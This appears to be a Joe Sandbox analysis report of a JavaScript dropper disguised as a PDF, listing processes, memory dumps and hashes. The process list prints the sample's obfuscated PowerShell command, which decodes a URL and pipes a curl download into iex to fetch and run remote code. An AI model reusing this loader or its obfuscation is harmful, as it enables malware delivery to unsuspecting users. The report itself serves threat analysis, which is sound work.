Nov 15, 2024 18:23:51.688074112 CET | 1289 | IN | Data Raw: 7d 2e 67 62 70 63 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 70 63 20 2e 67 62 70 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 2e 67 62 70 64 20 2e 67 62 6d 74
Data Ascii: }.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)}.gbps2{color:#666;display:block}.gbp0{display:none}.gbp0 .gbps2{font-weight:bo



Target ID: 0
Start time: 12:23:43
Start date: 15/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
Imagebase: 0x7ff60f940000
File size: 170'496 bytes
MD5 hash: 0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 12:23:45
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
Imagebase: 0x7ff776db0000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 12:23:45
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
Imagebase: 0x7ff790c40000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Memory Dump Source
• Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 004a6b1bf1045b48a36c57368e38e82b980d54f2bb2e27ea5558a63c98e3365d
• Instruction ID: 8af52d9e795b802b4358c6bdd30ee16a1b8761a638c6fd603aca02a0ccbc4e95
• Opcode Fuzzy Hash: 004a6b1bf1045b48a36c57368e38e82b980d54f2bb2e27ea5558a63c98e3365d
• Instruction Fuzzy Hash: 03F1A430A18A8E8FEBA8DF28C8557E977D1FF55310F04826EE85EC7291CB349945CB91

Memory Dump Source
• Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 617513c5be588d036a2ac937b770bb596a7f7d894eddd3878f973911a9313e79
• Instruction ID: c32288aaa9fa81461c36995694f7fd9df072d1a663faf9d7ba24d2d07356261f
• Opcode Fuzzy Hash: 617513c5be588d036a2ac937b770bb596a7f7d894eddd3878f973911a9313e79
• Instruction Fuzzy Hash: EAE1D330A08A4E8FEBA8DF28C8557E977D1EF55350F14826ED85EC72D1CA74A841CB91
Strings

Memory Dump Source
• Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
Similarity
• API ID:
• String ID: 6,N$(}+$(}+$H|+$H|+$H|+$H|+$H|+$J{v*$pU+
• API String ID: 0-337388468
• Opcode ID: 90b8e1a42412e9414ccd0959f205ef1e7e8c37b3ee38144c630733bcacdc58f1
• Instruction ID: 34a7bacc5b656d117e232c2b99263d553fb56faf22e510e3ed56df0cca31e1f3
• Opcode Fuzzy Hash: 90b8e1a42412e9414ccd0959f205ef1e7e8c37b3ee38144c630733bcacdc58f1
• Instruction Fuzzy Hash: 2122277290DA9D4FE799DA28C8A5274BBE2EF55311B1801BEC05DC71D3DE2AAC06C321
Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N$2~v*$BNv*$Xz+$Xz+$`7K:$p!+$z@_L
                                                                                                    • API String ID: 0-3260872431
                                                                                                    • Opcode ID: e03216e223be25304c08c1059c7744aba41b593e82397233a1dfdf08225f6b49
                                                                                                    • Instruction ID: afde9c39cf66b7c1c4c01588a9f59a04c8a9128c438c7c841614262529c09b29
                                                                                                    • Opcode Fuzzy Hash: e03216e223be25304c08c1059c7744aba41b593e82397233a1dfdf08225f6b49
                                                                                                    • Instruction Fuzzy Hash: A3721522A1CA9E4FEB95E72CC8A5664B7E2EF64301F5801BDC05DC72C3DE29AC45C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N$2~v*$BNv*$Xz+$Xz+$`7K:$p!+
                                                                                                    • API String ID: 0-2153204993
                                                                                                    • Opcode ID: 0eed714972ea693d150d4b5d831dc23933d6ab32e84822af879ede0399b2a939
                                                                                                    • Instruction ID: 3130f5c00930b7a73a7b1ecfafa4d3390dfbe57a9a0f33b7336e7c0784683eb2
                                                                                                    • Opcode Fuzzy Hash: 0eed714972ea693d150d4b5d831dc23933d6ab32e84822af879ede0399b2a939
                                                                                                    • Instruction Fuzzy Hash: 73721322A1CA994FEB95DB2CC8A5664BBE2EF65300F5801FDC05DD71C3DE29AC45C721
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N
                                                                                                    • API String ID: 0-3326779747
                                                                                                    • Opcode ID: 00020a93277d970e2ea7bd385196833ef7c0ae58e4cff97d043e078351a0c5e7
                                                                                                    • Instruction ID: 3fc65a72d9661b3bb8270e32cace1fd5a6d588e66cbee86fdd51feda66c9a188
                                                                                                    • Opcode Fuzzy Hash: 00020a93277d970e2ea7bd385196833ef7c0ae58e4cff97d043e078351a0c5e7
                                                                                                    • Instruction Fuzzy Hash: ADC15030E18A5D8FDF95DF58C494AB9BBF2FF58300F24816AD41DD7296CA24E881CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79929529209.00007FFCF4410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: X*(
                                                                                                    • API String ID: 0-4272852176
                                                                                                    • Opcode ID: 771b622448bcb19adf35f66a7809eb30d874985458cc4583806c1d61b4f1b8a2
                                                                                                    • Instruction ID: ddda11641ae2a1f37fbb71337f16e1c277995502eed94b739375822cfba14222
                                                                                                    • Opcode Fuzzy Hash: 771b622448bcb19adf35f66a7809eb30d874985458cc4583806c1d61b4f1b8a2
                                                                                                    • Instruction Fuzzy Hash: 32A15822A0DA9D4FE79A972894A5574BFD2EF8A310B1A01FFC09DC70D7ED14AC02C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h_+
                                                                                                    • API String ID: 0-1391441272
                                                                                                    • Opcode ID: 967d1ef6d0a9cab007d02e511b84a0ca40657755e403fffd0d3c302a88c72b39
                                                                                                    • Instruction ID: 1abd0037cb3b91743548fc9c706957f31d02197f0065e499103543b7a1ce1d45
                                                                                                    • Opcode Fuzzy Hash: 967d1ef6d0a9cab007d02e511b84a0ca40657755e403fffd0d3c302a88c72b39
                                                                                                    • Instruction Fuzzy Hash: C3814572A0DA9E0FEB55EB6888A91B9BBE1EF05315F0800FED45CC70D3DA59AC45C361
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2~v*
                                                                                                    • API String ID: 0-2279062986
                                                                                                    • Opcode ID: ea66f34932d82ad0c920f09309eec007206a0829d859c638bf8e253c5c37cad0
                                                                                                    • Instruction ID: b0f4e65fed78d79ad2ece2ac4f9026d019c853490dec074ba296670ff24f1acf
                                                                                                    • Opcode Fuzzy Hash: ea66f34932d82ad0c920f09309eec007206a0829d859c638bf8e253c5c37cad0
                                                                                                    • Instruction Fuzzy Hash: 4B81F122A1CA9A4FEB99E72CC8A5664B7E2EF65304F5800FDC05DC71C3DE2AAC45C751
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2~v*
                                                                                                    • API String ID: 0-2279062986
                                                                                                    • Opcode ID: 1c56bc2eda15b82489e2ac07e7c074524d15ee6a6e198ddc88dc08ef60fe2e78
                                                                                                    • Instruction ID: 4837ea6b23c82ba25e51e99b66861dda0f04e86b1712bd02ac8c97b8c1fc2e59
                                                                                                    • Opcode Fuzzy Hash: 1c56bc2eda15b82489e2ac07e7c074524d15ee6a6e198ddc88dc08ef60fe2e78
                                                                                                    • Instruction Fuzzy Hash: F561F222A1C99A4FEB98EA2CC8A5668B7E1FF65300F5841F9C05DC72D2DD2AAC41C751
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ce3ae27a8febf70a55ffe6eb420dc48eb5b6c7286954e8a5bdd864c9a770f8e
                                                                                                    • Instruction ID: 2a02ee956ba6347fd375e3128a9a6459d58b319e433a1d3e03327c14a2300a17
                                                                                                    • Opcode Fuzzy Hash: 4ce3ae27a8febf70a55ffe6eb420dc48eb5b6c7286954e8a5bdd864c9a770f8e
                                                                                                    • Instruction Fuzzy Hash: 32B1C630A0CA4D4FEB68DF28C8557E97BE1FF55350F14826EE84EC7291DA34A845CB92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e632a4113e47c816a25475b2275cac9675107303dbb7191379f5b100e3ff6a89
                                                                                                    • Instruction ID: 327b45e2e4b15dd33fe31122793f6ab3de13687ffc62f8f802d185af9bf606dc
                                                                                                    • Opcode Fuzzy Hash: e632a4113e47c816a25475b2275cac9675107303dbb7191379f5b100e3ff6a89
                                                                                                    • Instruction Fuzzy Hash: F8618D7091C7854FE359DB28C8A15B2BBF1EF56324B1440BED0DAC7293DA24A806C762
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7916209dd1328641abcf0624a2f7bfdacae8ab8e119f4afd3ffd7315372b5c95
                                                                                                    • Instruction ID: 2aacbfc0fe10152dc3ad78406552c622be358462ea6f483409786a183bf07297
                                                                                                    • Opcode Fuzzy Hash: 7916209dd1328641abcf0624a2f7bfdacae8ab8e119f4afd3ffd7315372b5c95
                                                                                                    • Instruction Fuzzy Hash: E531E53191CB4C8FDB18DB5C984A6A8BBE0FB59311F00826FE049C3252CB70A856CBD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79923814622.00007FFCF401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF401D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf401d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 89c20d3d8e7f022aa63d7ac4dca3e07c80093d803ed5cf3b153e939f39727c4d
                                                                                                    • Instruction ID: 2ae81e1beafb529391d73e7ee4effe8600ae48782d39fa53860751ca8ad8f660
                                                                                                    • Opcode Fuzzy Hash: 89c20d3d8e7f022aa63d7ac4dca3e07c80093d803ed5cf3b153e939f39727c4d
                                                                                                    • Instruction Fuzzy Hash: 47412A7140DBC88FE7568B28D8959533FF0EF52224B1605DFD08ACB1E3D625A846C7A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79929529209.00007FFCF4410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32357379844eaca5e32a1e54d284c89cc39a20ce6b8081216bf9ca7d4222155d
                                                                                                    • Instruction ID: c1fc8d0e464a19faec77724c596dcfb11d20e766e15bf5e00bbc8218eb87cf81
                                                                                                    • Opcode Fuzzy Hash: 32357379844eaca5e32a1e54d284c89cc39a20ce6b8081216bf9ca7d4222155d
                                                                                                    • Instruction Fuzzy Hash: 88314822E1D96E8FE7969718D0F1134BEC2EFC8350B5A02BBC45DD71CADD14AC01DAA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21bee4c9b6a7d1b8ed21224c72219f29f0afb6401cf3900f61b2156610c87340
                                                                                                    • Instruction ID: 961d5b50fa32ea2d8594138856737f5061889962920472978087137b53904e0c
                                                                                                    • Opcode Fuzzy Hash: 21bee4c9b6a7d1b8ed21224c72219f29f0afb6401cf3900f61b2156610c87340
                                                                                                    • Instruction Fuzzy Hash: 2421EA3090CA4C8FEB59DF9CD8497E97BE0EB96321F04826FD049C3156D6749455CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32a163f0e95f03248e45e45fe2025085eb1017930277cf36ef2fede0b289382f
                                                                                                    • Instruction ID: 1d47be99af5b83eb2435ab164e40c1a6fa6214ba6d4651c608b815260f22180d
                                                                                                    • Opcode Fuzzy Hash: 32a163f0e95f03248e45e45fe2025085eb1017930277cf36ef2fede0b289382f
                                                                                                    • Instruction Fuzzy Hash: 53310130D2865D9EFBB49F28CC557F97695FF42315F408139D41E860D2DA386945CB31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad0cef07d659e5a53188e0b71fa1a9a1096079a16d0d8bd3bc21cf53cd66dd48
                                                                                                    • Instruction ID: eec3fc8b41693c0356c19ff22e7858f42cff43ce65f5255fd397f1052df9be6b
                                                                                                    • Opcode Fuzzy Hash: ad0cef07d659e5a53188e0b71fa1a9a1096079a16d0d8bd3bc21cf53cd66dd48
                                                                                                    • Instruction Fuzzy Hash: 8321356280D7D50FE7069B2C9861160BFA0EF03224B1881EFD0E5CE0E3C41AA88AC362
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5dad00dda9ec2283b40f4625e59f838836cd46c2c02a3baf10a9bf0ef0fe30d6
                                                                                                    • Instruction ID: 47b4b9608747a87a660e7ba1239fe821fc324f7e0faa02461c0ac697a20a1b2e
                                                                                                    • Opcode Fuzzy Hash: 5dad00dda9ec2283b40f4625e59f838836cd46c2c02a3baf10a9bf0ef0fe30d6
                                                                                                    • Instruction Fuzzy Hash: 7701447161CB0C4FDB44EF4CE491AA5B7E0FB95324F10056EE58AC3691D636E892CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14fb9d99497b21f7f60adee370d8cbae54dea61d564591c51fe3a1eba52ad0f3
                                                                                                    • Instruction ID: 4e3380338426ea17c660b9b848fab854fce094e5edca3490d3e5d72ec7a73a36
                                                                                                    • Opcode Fuzzy Hash: 14fb9d99497b21f7f60adee370d8cbae54dea61d564591c51fe3a1eba52ad0f3
                                                                                                    • Instruction Fuzzy Hash: F9F02B75848A8D4FDB49EF28C8595D4BFA0FF17210B0442DBD459C70F2DB649454CB92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0b35bf0f62fc4b7a7c2b68f8e7e794ab11c9b5f188b8079580d7a16a2d9be68
                                                                                                    • Instruction ID: f67df6789bb0d8a6646a3631274e9379ad26d6882074361e321ac1729d27b570
                                                                                                    • Opcode Fuzzy Hash: a0b35bf0f62fc4b7a7c2b68f8e7e794ab11c9b5f188b8079580d7a16a2d9be68
                                                                                                    • Instruction Fuzzy Hash: C2D0121270E89D4FE798BA1C64552A9A393D7C82D6B3441FBD18DC71C5CD565C094391
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N
                                                                                                    • API String ID: 0-3326779747
                                                                                                    • Opcode ID: 68311d9802d7d03069c1bcc2b7e3e318ff85ebd2256d5047cf08f90fd5376763
                                                                                                    • Instruction ID: 8736ed9f4bd192d93bed1bd0cbb210bd7e7c061b4f9c1120f1d75ff84b5da3f4
                                                                                                    • Opcode Fuzzy Hash: 68311d9802d7d03069c1bcc2b7e3e318ff85ebd2256d5047cf08f90fd5376763
                                                                                                    • Instruction Fuzzy Hash: B812B671E0895E8FEB55EB1CC8A55F9BBA2FF54310F2481B6D059C71D2DE28AC42C7A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ea87181db3bfa259ae8c37d27874e9032e4abab4b49eb1679d038cc98488be7
                                                                                                    • Instruction ID: b74e7f861dc4754bcede9daa8fbfa35aa50611894165d8e3ef796efbb74acd87
                                                                                                    • Opcode Fuzzy Hash: 1ea87181db3bfa259ae8c37d27874e9032e4abab4b49eb1679d038cc98488be7
                                                                                                    • Instruction Fuzzy Hash: B4224772D0D79E8FE746D658C8A55B1BBE2EF92324B2840FEC099870D3E9196807C771
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7beaea1d82d6243297b5b08eae502e58cf8120b3908f15747a5881321648fffb
                                                                                                    • Instruction ID: 18398da9c0c085ec93369116c4f756b6cc17c15edd81046a285da714cf8e3e6a
                                                                                                    • Opcode Fuzzy Hash: 7beaea1d82d6243297b5b08eae502e58cf8120b3908f15747a5881321648fffb
                                                                                                    • Instruction Fuzzy Hash: 59E1C0A3E0D6E65BF756A63CA8B51F5AFA1EF5262472940F7C4948A0E39C0D180AC371
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0be964bf86a9d4bc2dd8aaecd66521cf15b8a37be02f111136243804f2664eb
                                                                                                    • Instruction ID: bb7dcf0f5cfd5e6bffa0f7702978edb05fd7a9d01e316a5535d40ca80f145c30
                                                                                                    • Opcode Fuzzy Hash: b0be964bf86a9d4bc2dd8aaecd66521cf15b8a37be02f111136243804f2664eb
                                                                                                    • Instruction Fuzzy Hash: 20517EA3E0E6E65FF752666898B60F57FA1EF5322071940F7C4A48B0D3E91D2806C772
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8d~*$@JIN$p@]N$s}ZI$x.IN
                                                                                                    • API String ID: 0-2117975329
                                                                                                    • Opcode ID: 1374cbed9afebab758603d17096ea2e707b88572b105a4f90ff3f055256fa358
                                                                                                    • Instruction ID: 6e39fe92c1ca8f8b2af38134c1651d7878aa6e5c1fa8a7081d13d78d5534bd3a
                                                                                                    • Opcode Fuzzy Hash: 1374cbed9afebab758603d17096ea2e707b88572b105a4f90ff3f055256fa358
                                                                                                    • Instruction Fuzzy Hash: BB71E543D0F9E61FF711866859B4178AFD2AF92750B7880FBD0F94A0EBA858B905C371
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @JIN$PM4J$p@]N$s}ZI$x.IN
                                                                                                    • API String ID: 0-2180078961
                                                                                                    • Opcode ID: de397138b6b713b72d004f9c9e7d025f9159bd2929b501464d5ef9c2892b6a78
                                                                                                    • Instruction ID: a89c4c0a02a9db54f3c93ea7b0b95f1af0cca13f2375fa5b9ef8ebb38a897b8e
                                                                                                    • Opcode Fuzzy Hash: de397138b6b713b72d004f9c9e7d025f9159bd2929b501464d5ef9c2892b6a78
                                                                                                    • Instruction Fuzzy Hash: 04218543D0FAE60FE746467C98641749FD2AF9265072D80FBD0F84B0EBA858AE09D375
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BNv*$Xz+$Xz+$`7K:
                                                                                                    • API String ID: 0-3782686236
                                                                                                    • Opcode ID: e875d4dea062d779a9e80b6dde60ab7a677793770672d9564cfc20860994422d
                                                                                                    • Instruction ID: e6a0d6822d69974bfdd387a066218a916e7c123c4c6b5ef3a672ed2d314b08f0
                                                                                                    • Opcode Fuzzy Hash: e875d4dea062d779a9e80b6dde60ab7a677793770672d9564cfc20860994422d
                                                                                                    • Instruction Fuzzy Hash: E391E462E1CA9A4FE759E62C88B6274B7D2EF65302F5801BDC46DC72C3DD29AC05C361
                                                                                                    Strings
